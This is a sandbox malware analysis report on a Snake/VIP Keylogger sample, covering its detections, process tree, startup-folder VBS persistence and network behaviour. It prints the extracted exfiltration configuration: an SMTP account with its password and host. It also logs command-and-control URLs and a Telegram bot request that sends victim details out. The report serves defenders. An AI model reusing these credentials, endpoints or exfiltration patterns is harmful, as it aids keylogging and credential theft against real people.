Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1newpo.exe

Overview

General Information

Sample name:z1newpo.exe
Analysis ID:1513179
MD5:c087116b5a47a54e5dd272162fd87b3b
SHA1:71eb7a31ed81367c95563f6d4aadfb6ea028b997
SHA256:5988ba6bf97c1b33f469edfca96b98c35d2054f2ce49d8e065d23250a241a3d0
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z1newpo.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\z1newpo.exe" MD5: C087116B5A47A54E5DD272162FD87B3B)
    • name.exe (PID: 788 cmdline: "C:\Users\user\Desktop\z1newpo.exe" MD5: C087116B5A47A54E5DD272162FD87B3B)
      • RegSvcs.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\z1newpo.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: C087116B5A47A54E5DD272162FD87B3B)
      • RegSvcs.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.RegSvcs.exe.370000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              3.2.RegSvcs.exe.370000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                3.2.RegSvcs.exe.370000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  3.2.RegSvcs.exe.370000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    3.2.RegSvcs.exe.370000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2d5eb:$a1: get_encryptedPassword
                    • 0x2d8f8:$a2: get_encryptedUsername
                    • 0x2d409:$a3: get_timePasswordChanged
                    • 0x2d504:$a4: get_passwordField
                    • 0x2d601:$a5: set_encryptedPassword
                    • 0x2ec8b:$a7: get_logins
                    • 0x2ebee:$a10: KeyLoggerEventArgs
                    • 0x2e853:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 27 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5616, ProcessName: wscript.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3636, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49732
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5616, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-18T15:26:05.694557+020028033053Unknown Traffic192.168.2.749701188.114.96.3443TCP
                    2024-09-18T15:26:07.306113+020028033053Unknown Traffic192.168.2.749703188.114.96.3443TCP
                    2024-09-18T15:26:09.776818+020028033053Unknown Traffic192.168.2.749705188.114.96.3443TCP
                    2024-09-18T15:26:11.401270+020028033053Unknown Traffic192.168.2.749707188.114.96.3443TCP
                    2024-09-18T15:26:15.101822+020028033053Unknown Traffic192.168.2.749711188.114.96.3443TCP
                    2024-09-18T15:26:17.610438+020028033053Unknown Traffic192.168.2.749715188.114.96.3443TCP
                    2024-09-18T15:26:18.618702+020028033053Unknown Traffic192.168.2.749719188.114.96.3443TCP
                    2024-09-18T15:26:20.863212+020028033053Unknown Traffic192.168.2.749723188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-18T15:26:04.128767+020028032742Potentially Bad Traffic192.168.2.749699132.226.8.16980TCP
                    2024-09-18T15:26:05.113363+020028032742Potentially Bad Traffic192.168.2.749699132.226.8.16980TCP
                    2024-09-18T15:26:06.597534+020028032742Potentially Bad Traffic192.168.2.749702132.226.8.16980TCP
                    2024-09-18T15:26:17.097628+020028032742Potentially Bad Traffic192.168.2.749713132.226.8.16980TCP
                    2024-09-18T15:26:18.050710+020028032742Potentially Bad Traffic192.168.2.749713132.226.8.16980TCP
                    2024-09-18T15:26:19.628818+020028032742Potentially Bad Traffic192.168.2.749722132.226.8.16980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: z1newpo.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\directory\name.exeAvira: detection malicious, Label: HEUR/AGEN.1321293
                    Found malware configuration
                    Source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                    Source: 12.2.name.exe.12d0000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\directory\name.exeReversingLabs: Detection: 73%
                    Multi AV Scanner detection for submitted file
                    Source: z1newpo.exeReversingLabs: Detection: 73%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: z1newpo.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: z1newpo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49739 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00452492
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_004788BD
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,12_2_0045CAFA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045DE8F FindFirstFileW,FindClose,12_2_0045DE8F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0245F8E9h3_2_0245F640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0245FD41h3_2_0245FA98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 060331E0h3_2_06032DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06030D0Dh3_2_06030B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06031697h3_2_06030B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06032C19h3_2_06032968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603E0A9h3_2_0603DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603E959h3_2_0603E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603F209h3_2_0603EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603CF49h3_2_0603CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603D7F9h3_2_0603D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603E501h3_2_0603E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603EDB1h3_2_0603EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603F661h3_2_0603F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603FAB9h3_2_0603F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06030040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603D3A1h3_2_0603D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 060331E0h3_2_0603310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0603DC51h3_2_0603D9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008DF8E9h13_2_008DF631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008DFD41h13_2_008DFA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FF31E0h13_2_05FF2DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FF2C19h13_2_05FF2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FF0D0Dh13_2_05FF0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FF1697h13_2_05FF0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FF31E0h13_2_05FF2DBE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFD7F9h13_2_05FFD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFCF49h13_2_05FFCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFF209h13_2_05FFEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFE959h13_2_05FFE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFE0A9h13_2_05FFDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFDC51h13_2_05FFD9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FF31E0h13_2_05FF310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFD3A1h13_2_05FFD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_05FF0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFFAB9h13_2_05FFF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFF661h13_2_05FFF3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFEDB1h13_2_05FFEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FFE501h13_2_05FFE258

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.7:49732 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
